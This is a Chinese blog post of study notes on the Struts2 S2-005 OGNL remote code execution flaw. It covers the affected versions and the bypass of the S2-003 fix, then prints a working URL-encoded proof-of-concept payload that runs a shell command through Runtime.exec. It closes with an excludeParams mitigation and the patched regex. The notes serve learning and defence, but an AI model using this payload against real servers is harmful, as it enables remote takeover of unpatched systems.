【无标题】(RCE)(Struts2)(笔记)s2-005漏洞学习笔记

已于 2024-07-18 23:14:37 修改
阅读量168 收藏 3
点赞数 8
文章标签: struts 笔记 学习 web安全 安全
于 2024-07-18 23:13:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aaaadoga/article/details/140535526
版权

写在前面

这篇文章是关于作者学习s2-005漏洞的笔记
关于这篇文章,如果有建议或问题请留言或联系h3llow0rld@foxmail.com

正文

漏洞分析

漏洞详情页
环境获取
如果想远程调试,参考这篇文章

影响版本

Struts 2.0.0 - Struts 2.1.8.1

漏洞原理

漏洞原理同s2-003,本质上是对恶意字符过滤不充分,在修补s2-003的时候,官方的做法是新增加 allowStaticMethodAccess 属性,这相当于上了把锁,但是钥匙还在别人手里,只要把这个属性关了,就绕过限制了

利用条件/测试情景

s2-003

利用方法

PoC:(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1

如何修复
紧急处理方法(仅供参考)

配置struts.xml文件

<interceptor-ref name="params">
    <param name="excludeParams">dojo\..*,^struts\..*,.*\\.*,.*\(.*,.*\).*,.*@.*</param>
</interceptor-ref>

观察恶意请求的流量特征,设置安全设备的防护规则

补丁修复方法

重新设计了匹配的正则表达式:

private String acceptedParamNames = "[a-zA-Z0-9\\.\\]\\[\\(\\)_'\\s]+";
h4ckb0ss
关注
struts2反序列化漏洞,存在s2-005s2-016、s2-016_3、s2-017
08-28
struts2.0反序列化漏洞,存在s2-005s2-016、s2-016_3、s2-017等漏洞解决方案,已升级可用
Apache Struts2 S2-005 远程代码执行漏洞
m0_63241485的博客
08-20 1546
XWork会将GET参数的键和值利用OGNL表达式解析成Java语句,如:user.address.city=Bishkek&user[‘favoriteDrink’]=kumys//会被转化成触发漏洞就是利用了这个点,再配合OGNL的沙盒绕过方法,组成了S2-003。官方对003的修复方法是增加了安全模式(沙盒),S2-005在OGNL表达式中将安全模式关闭,又绕过了修复方法。整体过程如下:S2-003 使用\u0023绕过s2对#的防御S2-003 后官方增加了安全模式(沙盒)
java struts2 漏洞复现合集
whatday的专栏
08-31 5563
目录 一、S2-001复现 二、S2-005复现 三、S2-007复现 四、S2-008复现 五、S2-009复现 六、S2-012复现 七、S2-013复现 八、S2-015复现 九、S2-016复现 十、S2-045复现 十一、S2-048复现 十二、S2-052复现 十三、S2-053复现 十四、S2-057复现 十五、S2-019复现 十六、S2-devMode 复现 Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
Struts2 系列漏洞 - S2-003、S2-005
YJ_12340的博客
06-11 767
前面一篇文章也有提到 struts2 在进入 action 进行逻辑处理前(以及逻辑处理后),会进入 18 个拦截器栈中对请求进行必要的处理(如果没有自定义拦截器的话,可以在 struts-default.xml 中找到相应的拦截器栈,如下下图【这里只有 17 个拦截器 233 】)。下图为 struts2 在处理请求时走过的流程。
struts S2-005 远程代码执行漏洞
haha1314的博客
07-15 2278
S2-005 远程代码执行漏洞 影响版本: 2.0.0 - 2.1.8.1 漏洞详情: http://struts.apache.org/docs/s2-005.html 原理 参考吴翰清的《白帽子讲Web安全》一书。 s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OG...
struts2.3.32修补S2-045漏洞所有核心jar包及依赖的jar(含core包)
03-09
S2-045漏洞是一个严重的远程代码执行(RCE漏洞,存在于Apache Struts2的OGNL表达式语言中。这个漏洞允许攻击者通过精心构造的HTTP请求在服务器端执行任意代码,对系统安全构成极大威胁。Struts2.3.32的发布就是...
Struts2-RCE:Burp Extender用于检查struts 2 RCE漏洞
04-15
此Burp扩展程序检测以下18个RCE,它们是S2-001 S2-007 S2-008 S2-012 S2-013 S2-014 S2-015 S2-016 S2-019 S2-029 S2-032 S2-033 S2-037 S2-045 S2-048 S2-053 S2-057 S2-DevMode加载扩展Burp Suite- > Extender- >...
Apache Struts2S2-045)漏洞升级指南
03-07
### Apache Struts2 (S2-045) 漏洞升级指南 #### 一、漏洞概述 **Apache Struts2** 是一个基于MVC架构的开源Web应用程序框架,广泛应用于Java EE的企业级应用开发中。然而,在2017年3月,**Apache Struts2** 被...
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
S2-045 漏洞,官方称为“基于Struts2的Content-Type注入”,是在2017年被发现的。这个漏洞存在于Struts2的Jakarta插件中,该插件处理HTTP请求头中的Content-Type字段时存在缺陷。攻击者可以通过精心构造的HTTP请求,...
【研究】Struts2漏洞S2-005漏洞环境和POC
god_Zeo的安全博客
07-01 2090
【研究】Struts2漏洞S2-005漏洞环境和可用POC1.环境2.原理3.影响版本4.利用过程POC 1.环境 环境 https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md 这个搭环境很方便快捷,具体可以看说明,很简单 2.原理 参考吴翰清的《白帽子讲Web安全》一书。 s2-005漏洞的起源源于S2-003(受影响版本...
[旧文系列] Struts2历史高危漏洞系列-part1:S2-001/S2-003/S2-005
mole_exp的博客
01-17 1302
文章目录关于<旧文系列>前言S2-001漏洞复现和分析可回显PoC漏洞修复S2-003漏洞复现与分析可回显PoC漏洞修复S2-005漏洞复现与分析可回显PoC漏洞修复Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技术文章,挑选其中一些值得保留的,迁移到当前博客来。 文章首发于奇安信攻防社区: https://forum.butian.net/share/601 https://forum.butian.net/share/602 htt
Struts2漏洞分析与研究之S2-005漏洞分析
热门推荐
Exploit的小站~
05-10 2万+
 转载请注明出处:http://blog.csdn.net/u011721501?viewmode=list 1、概述 S2-005是由于官方在修补S2-003不全面导致绕过补丁造成的。我们都知道访问Ognl的上下文对象必须要使用#符号,S2-003对#号进行过滤,但是没有考虑到unicode编码情况,导致\u0023或者8进制\43绕过。 S2-005则是绕过官方的安全配...
笔记)第三期书生·浦语大模型实战营(十一卷王场)--书生入门岛通关第2关Python 基础知识
haidizym的博客
10-02 439
学员闯关手册:https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频:https://www.bilibili.com/video/BV1mS421X7h4/课程文档:https://github.com/InternLM/Tutorial/tree/camp3/docs/L0/Python。
江科大笔记—LED闪烁& LED流水灯& 蜂鸣器
m0_62005595的博客
09-28 485
LED闪烁& LED流水灯& 蜂鸣器
【韩顺平Java笔记】第6章:数组、排序和查找
最新发布
随手写写
10-02 714
排序是将多个数据,依指定的顺序进行排列的过程。
Spring(学习笔记
m0_74728220的博客
10-02 970
context:annotation-config/>是 Spring 配置文件中的一个标签,用于开启注解配置功能。这个标签可以让 Spring 容器识别并处理使用注解定义的 bean。例如,可以使用 @Autowired 注解自动装配 bean,或者使用 @Component 注解将类标记为 bean 等。为什么加载上下文的时候,被包含的Bean它的构造函数的代码会执行呀?好像是很多代码都执行了!!!没有无参构造,有有参构造会报错!也就是说必须要有无参构造!这是为什么呀!
Coursera_ Algorithms I 学习笔记:Module_3_Analysis_of_Algorithm_Introduction
approximately_的博客
09-29 1180
Coursera_ Algorithms I 学习笔记:Module_3_Analysis_of_Algorithm_Introduction
项目-坦克大战学习笔记-控制玩家坦克不超出地图范围
2401_84659046的博客
10-02 551
由于坦克自身有占用像素格,而坦克生成位置是以左上角x,y的点开始生成,所有坦克向下和向右的实际碰撞位置应该是坦克生成位置加上坦自身宽或高,而坦克有四个方向就有4种对象碰撞可能,所以我们在物体对象的父类中声明存储物体宽和高的int类型。if (Fangxiang == fangxiang.Up)//检测坦克目前朝向。//设置父类继承过来的图片对象高。//设置父类继承过来的图片对象宽。}//放置图片对象的高。}//重写方向构造函数,调用传入的方向信息设置图片的宽高信息。
Struts2 S2-020漏洞在Tomcat 8下的动态RCE攻击研究
本文主要探讨了Struts2框架中的S2-020漏洞在Tomcat 8.0.3版本下的命令执行分析。S2-020漏洞是一个严重威胁,允许攻击者利用OGNL表达式进行远程代码执行(RCE),从而可能导致DOS攻击和恶意文件下载。由于漏洞涉及到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值